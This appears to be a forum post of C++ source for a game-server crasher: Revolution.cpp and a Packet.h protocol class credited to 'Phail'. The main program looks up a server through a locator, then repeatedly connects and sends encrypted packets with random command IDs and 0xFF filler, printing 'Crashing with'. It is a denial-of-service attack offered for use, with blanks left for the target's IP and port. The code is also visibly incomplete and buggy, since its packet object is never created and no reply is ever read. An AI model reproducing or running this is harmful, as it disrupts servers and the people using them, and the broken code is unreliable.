Revolution.cpp
Code:
#include <stdio.h>
#include <Windows.h>
#include "Packet.h"
#pragma comment (lib, "WS2_32")
typedef struct Host
{
char szIP[64];
short nPort;
}*LPHOST;
LPHOST GetHostFromLocator()
{
WSADATA wsaData;
WSAStartup (MAKEWORD (2,2), &wsaData);
LPHOST lpHost = new Host();
int nRecv = 0;
PCHAR lpBuffer = new char[4096];
SOCKET fd = socket (AF_INET, SOCK_DGRAM, 0);
sockaddr_in sockAddr;
sockAddr.sin_addr.S_un.S_addr = INADDR_ANY;
sockAddr.sin_port = htons (7900);
sockAddr.sin_family = AF_INET;
sockaddr_in serverAddr;
serverAddr.sin_addr.S_un.S_addr = inet_addr ("IP HERE");
serverAddr.sin_port = htons (LOCATOR PORT HERE);
serverAddr.sin_family = AF_INET;
int nSize = sizeof(sockaddr);
while (true)
{
sendto (fd, "\x64\x00\x0b\x00\x73\x00\x05\x00\x41\x9c\x00", 11, 0, (sockaddr *)&serverAddr, sizeof(sockaddr));
if (nRecv < 1)
{
printf ("Failed to connect. Retrying\n");
Sleep (30000);
continue;
}
if (nRecv > 6 && lpBuffer[0] == 100)
{
in_addr a;
memcpy (&a, lpBuffer+23, 4);
int port = 0;
memcpy (&port, lpBuffer+27, 4);
strcpy (lpHost->szIP, inet_ntoa (a));
lpHost->nPort = port;
return lpHost;
}
}
return NULL;
}
int main()
{
unsigned short packetIDs[] =
{
0x144, 0x145, 0x3F3, 0x3F4, 0x44D, 0x4BD, 0x4D1, 0x5AC, 0x57A, 0x52A, 0x522, 0x4C6, 0x584, 0x585, 0x5B6, 0x5DE, 0x6A5, 0x6A6, 0x6B8,
0x6A8, 0x6AA, 0x6b6, 0x70a, 0x70c, 0x178, 0x71E, 0x728, 0x72D, 0x607, 0x610, 0x623, 0x619, 0x61B, 0x770, 0x7E0, 0x7E8, 0x7EA, 0x7EB,
0x803, 0xC1C, 0x177E, 0x17A3, 0x17A6, 0x1FA, 0x5209, 0x520E, 0x17D8, 0x5217, 0x9C42, 0x1F45, 0x1F43, 0x1F44, 0x723
};
SOCKET fd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
sockaddr_in sockAddr;
PBYTE lpBuffer;
PCHAR lpTemp = "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF";
PBYTE lpKey = new BYTE[32];
ZeroMemory (lpKey, 32);
while (true)
{
LPHOST lpHost = GetHostFromLocator();
if (lpHost == NULL)
{
Sleep (5000);
continue;
}
printf ("Connecting to: %s:%i\n", lpHost->szIP, lpHost->nPort);
fd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
sockAddr.sin_addr.S_un.S_addr = inet_addr (lpHost->szIP);
sockAddr.sin_family = AF_INET;
sockAddr.sin_port = htons (lpHost->nPort);
if (connect (fd, (sockaddr *)&sockAddr, sizeof(sockaddr)) == SOCKET_ERROR)
{
continue;
}
unsigned short id = packetIDs[rand() % (sizeof(packetIDs)-1)];
printf ("Crashing with: %X\n", id);
lpPacket->MakeCommand (id, 0);
lpPacket->WriteData(lpTemp, 64);
lpBuffer = lpPacket->FinalizePacket (100);
send (fd, (PCHAR)lpBuffer, lpPacket->mSize+8, 0);
printf ("Sent Packet.\n");
closesocket (fd);
delete lpPacket;
Sleep (50);
}
}
Packet.h
Code:
/* -----------------------------------------
File: Packet.h
Usage: Contains the full packet class for reading / writing to the initial buffer.
Author: Phail
-----------------------------------------*/
class CPacket
{
public:
unsigned char *mData;
unsigned char mKey[32];
short mSize;
unsigned char *BuildKey(char *pPacket)
{
byte Xor[] = { 0x57, 0x02,0x5B,0x04,0x34,0x06,0x01,0x08,0x37,0x0A,0x12,0x69,0x41,0x38,0x0F,0x78 };
byte mBytes[] = { 0x37,0x04,0x5D,0x2E,0x43,0x38,0x49,0x53,0x50,0x05,0x13,0xC9,0x28,0xA4,0x4D,0x05 }; //GameNao!
unsigned int szTmp = 0,szTmp2 = 0,szTmp3 = 0;
memcpy(mKey,pPacket+12,4);
memcpy(mKey+4,pPacket,12);
memcpy(mKey+16,mBytes,16);
for(int i=0; i<4; ++i)
{
memcpy(&szTmp,Xor+(i*4),4);
memcpy(&szTmp2,mKey+(i*4),4);
szTmp3 = szTmp ^ szTmp2;
memcpy(mKey+(i*4),&szTmp3,4);
}
return (unsigned char *)mKey;
}
void Encrypt(unsigned char *szBuffer, int iStart, int iLength)
{
for(int i=0; i < iLength; ++i)
{
unsigned short a = szBuffer[iStart+i];
a ^=mKey[i%32];
a <<= 3;
byte b = (byte)(a >> 8);
b |= (byte)(a & 0xFF);
b ^= 0xF0;
szBuffer[iStart + i] = (byte)b;
}
}
void Decrypt(unsigned char *szBuffer, int iStart, int iLength)
{
for (int i = 0; i < iLength; ++i)
{
byte a = szBuffer[iStart + i];
a ^= 0x0F0;
byte b = (byte)(7 & a);
b <<= 5;
a >>= 3;
b = (byte)(a | b);
szBuffer[iStart+i] = (byte)(b ^ mKey[i % 32]);
}
}
unsigned short Checksum(unsigned char *szBuffer, int iStart, int iLength)
{
unsigned int uiSum = (unsigned int)(szBuffer[iStart] + szBuffer[iStart+1] + szBuffer[iStart+2] + szBuffer[iStart+3]),uiSum2=0,uiSum3=0,uiSum4=0;
for(int i=6; i < iLength; ++i) uiSum2 += szBuffer[i];
uiSum3 = uiSum2 - uiSum;
uiSum4 = uiSum3 >> 0x10;
uiSum3 += uiSum4;
return (unsigned short)uiSum3;
}
void WriteData(void *pData, short pLength)
{
char cZero = 0x00;
if(pData == 0)
{
for(int i=0; i < pLength; i++)
{
memcpy(mData+mSize,&cZero,1);
mSize++;
}
}
else
{
memcpy(mData+mSize,pData,pLength);
mSize += pLength;
}
}
void WriteString(char *szBuffer)
{
short wSize = strlen(szBuffer)+1;
WriteData(&wSize,2);
WriteData(szBuffer,wSize);
}
short ReadShort()
{
short s = 0;
memcpy(&s,mData+mSize,2);
mSize+=2;
return s;
}
char *ReadString()
{
short wSize = ReadShort();
char *szString = (char *)malloc(wSize);
memset(szString,0,wSize);
memcpy(szString,mData+mSize,wSize);
mSize+=wSize;
return szString;
}
byte ReadByte()
{
byte out = mData[mSize];
mSize++;
return out;
}
long ReadLong()
{
long out = 0;
memcpy(&out,mData+mSize,4);
mSize+=4;
return out;
}
byte *ReadArray(short iSize)
{
byte *bArray = new byte[iSize];
memset(bArray,0,iSize);
memcpy(bArray,mData+mSize,iSize);
mSize+=iSize;
return bArray;
}
short GetLen(int iLast)
{
short wOut = 0;
for(int i=mSize; i < iLast; i++,wOut++)
{
if(mData[i] == 0){
wOut++;
break;
}
}
return wOut;
}
void SkipByte(short wSize)
{
mSize+=wSize;
}
void SetPos(short pVal)
{
mSize = pVal;
}
void WriteShort(short pIn)
{
memcpy((mData+mSize),&pIn,2);
mSize+=2;
}
void MakeCommand(short wCommand,byte val)
{
char cPacketId = val;
memcpy(mData,&wCommand,2);
memcpy(mData+2,&cPacketId,1);
mSize += 3;
}
unsigned char *FinalizePacket(unsigned short wVersion)
{
unsigned short wLen = mSize + 8;
unsigned short wLen2 = mSize+2;
unsigned short wChecksum = 0;
unsigned char *szPacket = new unsigned char[wLen];
byte bZero[] = {0x0,0x0};
memset(szPacket,0,wLen);
memcpy(szPacket,&wVersion,2);
memcpy(szPacket+2,&wLen,2);
if(wVersion == 0x65)Encrypt(szPacket,2,2);
memcpy(szPacket+4,&bZero,2);
memcpy(szPacket+6,&wLen2,2);
memcpy(szPacket+8,mData,mSize);
if(wVersion == 0x65)Encrypt(szPacket,6,mSize+2);
wChecksum = Checksum(szPacket,0,wLen);
memcpy(szPacket+4,&wChecksum,2);
return szPacket;
}
CPacket(int pLen,unsigned char pKey[32])
{
mData = (unsigned char *)malloc(pLen);
memset(mData,0,pLen);
mSize = 0;
memcpy(mKey,pKey,32);
}
CPacket(unsigned char *pDecrypted, short pStart, short pSize)
{
mData = (unsigned char *)malloc(pSize);
memset(mData,0,pSize);
memcpy(mData,pDecrypted,pSize);
mSize = pStart;
}
CPacket(unsigned char pKey[32])
{
memcpy(mKey,pKey,32);
}
CPacket(){}
~CPacket()
{
free((void *)mData);
mSize = 0;
}
};
Credits to Phail.